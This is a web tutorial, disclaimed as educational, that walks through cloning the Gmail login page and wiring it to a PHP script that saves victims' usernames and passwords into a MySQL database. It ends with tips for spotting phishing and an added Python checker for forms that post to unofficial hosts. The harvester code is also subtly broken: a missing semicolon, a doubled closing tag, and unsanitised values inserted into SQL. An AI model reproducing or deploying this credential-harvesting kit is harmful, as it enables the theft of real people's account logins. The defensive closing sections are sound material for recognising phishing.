DISCLAIMER:
I am not responsible for any damage caused by the user (you). This tutorial is purely for educational purposes and to help you protect yourself from hackers (ethical hacking). Please do not misuse this tutorial.
What are phishing pages?
These pages are generally used to steal usernames and passwords from the victim. For example, if I want a person's Yahoo ID, I make a fake login page that looks like Yahoo's login page. When the victim comes to my page, he thinks it is Yahoo's login page and types in his username and password. But when he types in his password, the page redirects to the Yahoo error page (https://login.yahoo.com/config/login?) and, at the same time, the info he typed goes into my database.
How to make fake phishing pages?
Given below are some of the steps with which you can create a fake login page for any website or server (Yahoo, Myspace, Hotmail, Zapak, AOL, Orkut, etc.). In this whole tutorial I'm taking the example of Gmail; for any other server's fake login, do the same. You will get the hang of it when you read the whole tutorial.
- First go to the Gmail login page "https://gmail.com".
- Right click on the page and go to "View Page Source".
- You will see the whole HTML code of the page (huge, huh?).
- Then select the whole HTML by pressing CTRL+A and copy it by pressing CTRL+C.
- Open a 'Text document' or 'Notepad', paste the copied contents into it and then save it as 'Gmail.html'. Now search for "action" by pressing CTRL+F and replace the link after action with "access.php" (I'm using PHP for phishing).
- Then you have to make an access.php file. For that, open another text document and paste the following code in it (you need a database to store login details; how to create a database using the Xampp server is discussed below).
$u=$_POST['Email'];
$p=$_POST['Passwd'];
$con=mysql_connect("serverhost","username","password") //Replacethese details with your database details
mysql_select_db("databaseName",$con); //select your database, into which you need to save others details
mysql_query("insert into login values('$u', '$p')"); //login is table name
?>
?>
- To execute the PHP script you need special plugins or a server to manage both PHP and the database. The best server I suggest is Xampp.
- Start the server, open a browser, type localhost or 127.0.0.1 in the URL bar and press Enter.
- Using the "phpMyAdmin" tab, create a database and in that database create a table named "login" with two attributes, one for the username and the other for the password.
- Now copy the "Gmail.html" and "access.php" files into xampp/htdocs.
- Now open a new tab and go to the URL "127.0.0.1/Gmail.html"; a "Gmail" phishing page is opened. Details of anyone who logs in from this page will be stored in the "login" table.
For xampp:
How To Identify The Phishing Mails:
- You can easily identify phishing mails by checking the URL in the address bar; make sure that the address is that of the mail server you are using.
- It is better not to enter the correct ID and password the first time you try to sign in.
- For a safe login, always type the URL in the address bar; don't enter your details in an already open page.
- Don't click on links on unknown or untrusted websites; it is better to keep yourself away from those sites and links.
- Don't provide your confidential data (username, password) on any other websites or forms.
- For a secure login, log in only from the official web pages of the service provider. There will be a lock symbol at the end of the address bar, which indicates a secure connection, and the protocol will be HTTPS://
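
As an added example (not part of the original tutorial), the sketch below automates the address-bar and HTTPS checks from the list above and also flags the tell-tale of a cloned page described earlier: a password form whose `action` no longer points at the service's own host. The `OFFICIAL_HOSTS` list, the function names and the sample HTML are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Assumption: hosts the real service uses for sign-in (illustrative list).
OFFICIAL_HOSTS = {"accounts.google.com", "mail.google.com"}


class _FormCollector(HTMLParser):
    """Collects each <form>'s action and whether it holds a password field."""
    def __init__(self):
        super().__init__()
        self.forms = []      # list of [action, has_password]
        self._open = None    # the form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._open = [a.get("action") or "", False]
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None and (a.get("type") or "").lower() == "password":
            self._open[1] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None


def _is_official(url):
    # Exact host match over HTTPS; "accounts.google.com.login.example" does not pass.
    parts = urlsplit(url)
    return parts.scheme == "https" and (parts.hostname or "").lower() in OFFICIAL_HOSTS


def audit_login_page(page_url, html):
    """Return a list of findings; an empty list means no check failed."""
    findings = []
    if not _is_official(page_url):
        findings.append(f"page not served from an official HTTPS host: {page_url}")
    collector = _FormCollector()
    collector.feed(html)
    for action, has_password in collector.forms:
        target = urljoin(page_url, action)  # relative actions resolve against the page
        if has_password and not _is_official(target):
            findings.append(f"password form posts to: {target}")
    return findings


# Constructed samples: a cloned page as described above, and a legitimate-looking one.
CLONE = '<form action="access.php" method="post"><input name="Email"><input type="password" name="Passwd"></form>'
REAL = '<form action="/signin" method="post"><input type="password" name="Passwd"></form>'
```

A lookalike host served over HTTPS still fails the check, which is why the lock symbol alone is not enough: the host name itself has to match the service you intend to use.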